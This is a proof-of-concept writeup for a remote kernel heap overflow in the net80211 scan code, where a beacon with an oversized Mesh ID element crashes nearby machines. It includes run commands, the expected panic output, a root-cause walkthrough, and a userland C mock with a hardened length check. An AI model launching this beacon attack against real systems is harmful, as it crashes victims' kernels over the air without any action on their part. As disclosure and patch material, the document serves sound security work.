# DF-0393 PoC — Remote Mesh ID heap overflow in ieee80211_scan_sta.c

## Summary

Sends a crafted 802.11 beacon carrying an oversized Mesh ID information element
(length byte = 200, against a 32-byte maximum). The scan subsystem copies
`2 + 200 = 202` bytes into the 34-byte `se_meshid` field of the scan entry,
overflowing by 168 bytes into the fields that follow it in the heap-allocated
entry, including the IE pointers and the list links.

## Build

```
pip install scapy
```

## Run

```
# Put WiFi adapter in monitor mode
sudo airmon-ng start wlan0
# Run the PoC on the monitor interface
sudo python3 poc.py --iface wlan0mon --count 100
```

## Expected output

The victim kernel panics with a page fault when it dereferences a corrupted
pointer from the overflowed `se_ies` struct or from the `se_list`/`se_hash` links:

```
Fatal trap 12: page fault while in kernel mode
virtual address = 0xdeadbeef41414141
cpuid = 0
KDB: stack backtrace:
#0  mi_switch+0x...
#1  sta_add+0x... at ieee80211_scan_sta.c:312
#2  sta_rx_mgmt+0x... at ieee80211_scan_sta.c:...
#3  ieee80211_deliver_l2+0x...
#4  ieee80211_input+0x...
```

## How it works

1. `ieee80211_parse_beacon()` (`ieee80211_input.c:621-622`) stores a pointer to
   the Mesh ID IE without checking its length byte.
2. `sta_add()` (`ieee80211_scan_sta.c:312`) executes
   `memcpy(ise->se_meshid, sp->meshid, 2 + sp->meshid[1])`, sizing the copy
   from that attacker-controlled length byte.
3. `ise->se_meshid` is 34 bytes (2 + the 32-byte maximum); the copy writes
   202 bytes, 168 of them past the end of the field.
4. The 168 overflow bytes land on the fields that follow `se_meshid` in the
   scan entry:
   - `se_ies` (struct of IE data pointers)
   - `se_age` (int)
   - `se_list` / `se_hash` (TAILQ/LIST link pointers)
5. The next time the scan table is walked (select_bss, sta_iterate,
   adhoc_age, ieee80211_ies_expand), the corrupted pointers are dereferenced
   and the kernel panics.
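The copy above, reproduced in userland as an added example (not code from the
PoC or from the net80211 source). `mock_scan_entry`, the `demo_*` helpers and
the 12-byte fixed beacon body are illustrative assumptions; only the field names
`se_meshid`, `se_ies`, `se_age` and the 34-byte size come from the page. The
example builds a beacon body with a Mesh ID IE of a chosen length, walks the IE
TLVs the way an unchecked parser would, computes the unchecked copy length and
the resulting overflow, and shows the hardened copy that rejects any length
byte above the Mesh ID maximum instead of truncating it:

```c
/* Added example: userland mock of the sta_add() Mesh ID copy.
 * Struct layout and helper names are assumptions for illustration. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IEEE80211_MESHID_LEN     32   /* assumed: 802.11s Mesh ID maximum */
#define IEEE80211_ELEMID_MESHID  114  /* 802.11-2012 element ID for Mesh ID */
#define MESHID_FIELD_LEN         (2 + IEEE80211_MESHID_LEN)  /* 34 bytes */
#define BEACON_FIXED_LEN         12   /* timestamp + interval + capability */

struct mock_scan_entry {                  /* assumed layout, not the kernel's */
    uint8_t  se_meshid[MESHID_FIELD_LEN]; /* overflowed field */
    void    *se_ies;                      /* stands in for the IE pointers */
    int      se_age;
    void    *se_list_next;                /* stands in for TAILQ/LIST links */
    void    *se_hash_next;
};

/* Walk the IE TLVs and return the Mesh ID IE (pointing at its ID byte) without
 * checking that its length is sane; NULL if absent or truncated by the frame. */
static const uint8_t *
find_meshid_ie(const uint8_t *frm, size_t len)
{
    const uint8_t *efrm = frm + len;
    while (efrm - frm > 1) {
        size_t ielen = frm[1];
        if (frm + 2 + ielen > efrm)       /* IE runs past end of frame */
            return NULL;
        if (frm[0] == IEEE80211_ELEMID_MESHID)
            return frm;                   /* length byte still unchecked */
        frm += 2 + ielen;
    }
    return NULL;
}

/* The vulnerable copy size: 2 + meshid[1], taken straight from the frame. */
static size_t
meshid_copy_len_unchecked(const uint8_t *meshid)
{
    return 2 + meshid[1];
}

/* Bytes that would spill past se_meshid for this IE; 0 if it fits. */
static size_t
meshid_overflow_bytes(const uint8_t *meshid)
{
    size_t n = meshid_copy_len_unchecked(meshid);
    return n > MESHID_FIELD_LEN ? n - MESHID_FIELD_LEN : 0;
}

/* Hardened copy: reject an oversized IE (drop the frame) rather than truncate. */
static int
sta_add_meshid_checked(struct mock_scan_entry *ise, const uint8_t *meshid)
{
    if (meshid == NULL || meshid[1] == 0)
        return 0;                         /* nothing to copy */
    if (meshid[1] > IEEE80211_MESHID_LEN)
        return -1;                        /* oversized: refuse */
    memcpy(ise->se_meshid, meshid, 2 + meshid[1]);
    return 0;
}

/* Constructed sample beacon body: fixed fields, an SSID IE, then a Mesh ID IE
 * whose length byte is meshid_len. Returns bytes written, 0 if it won't fit. */
static size_t
build_beacon_body(uint8_t *out, size_t cap, uint8_t meshid_len)
{
    size_t n = 0;
    if (cap < BEACON_FIXED_LEN + 6 + 2 + (size_t)meshid_len)
        return 0;
    memset(out, 0, BEACON_FIXED_LEN); n = BEACON_FIXED_LEN;
    out[n++] = 0; out[n++] = 4; memcpy(out + n, "mesh", 4); n += 4;
    out[n++] = IEEE80211_ELEMID_MESHID; out[n++] = meshid_len;
    memset(out + n, 'A', meshid_len); n += meshid_len;
    return n;
}

/* Wrappers that run the whole path for a given Mesh ID length byte. */
static size_t demo_unchecked_len(uint8_t meshid_len)
{
    uint8_t body[300]; size_t len = build_beacon_body(body, sizeof body, meshid_len);
    const uint8_t *ie = find_meshid_ie(body + BEACON_FIXED_LEN, len - BEACON_FIXED_LEN);
    return ie ? meshid_copy_len_unchecked(ie) : 0;
}
static size_t demo_overflow(uint8_t meshid_len)
{
    uint8_t body[300]; size_t len = build_beacon_body(body, sizeof body, meshid_len);
    const uint8_t *ie = find_meshid_ie(body + BEACON_FIXED_LEN, len - BEACON_FIXED_LEN);
    return ie ? meshid_overflow_bytes(ie) : 0;
}
static int demo_checked(uint8_t meshid_len)
{
    uint8_t body[300]; struct mock_scan_entry ise; memset(&ise, 0, sizeof ise);
    size_t len = build_beacon_body(body, sizeof body, meshid_len);
    const uint8_t *ie = find_meshid_ie(body + BEACON_FIXED_LEN, len - BEACON_FIXED_LEN);
    return sta_add_meshid_checked(&ise, ie);
}

int main(void)
{
    printf("len 200: copies %zu bytes, %zu past se_meshid, checked copy -> %d\n",
           demo_unchecked_len(200), demo_overflow(200), demo_checked(200));
    printf("len 32:  copies %zu bytes, %zu past se_meshid, checked copy -> %d\n",
           demo_unchecked_len(32), demo_overflow(32), demo_checked(32));
    return 0;
}
```

The checked version returns an error rather than clamping the copy to 32 bytes:
a truncated Mesh ID would still be accepted into the scan table under a name the
sender never advertised, so dropping the malformed beacon is the safer choice.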

## Notes

- The victim interface must be scanning for the beacon to reach the scan
  table; when associated, the background scan runs on its own every few
  seconds, so no action on the victim is needed.
- `IEEE80211_SUPPORT_MESH` is compiled in by default in X86_64_GENERIC.
- Same bug class as DF-0285, reached through a different code path (the
  generic beacon parser rather than the mesh-specific receive path).
